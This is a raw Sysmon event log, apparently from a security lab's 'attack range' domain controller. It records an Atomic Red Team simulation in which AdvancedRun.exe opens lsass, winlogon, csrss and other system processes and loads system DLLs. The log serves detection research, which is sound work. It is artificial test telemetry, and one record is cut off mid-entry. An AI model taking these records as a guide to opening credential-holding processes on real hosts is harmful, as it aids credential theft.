10341000x80000000000000003983005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003982998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003982994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003982992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.647{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003982987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft 
17:59:00.616{834264DD-F464-61EA-7B04-000000002702}21802204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.d
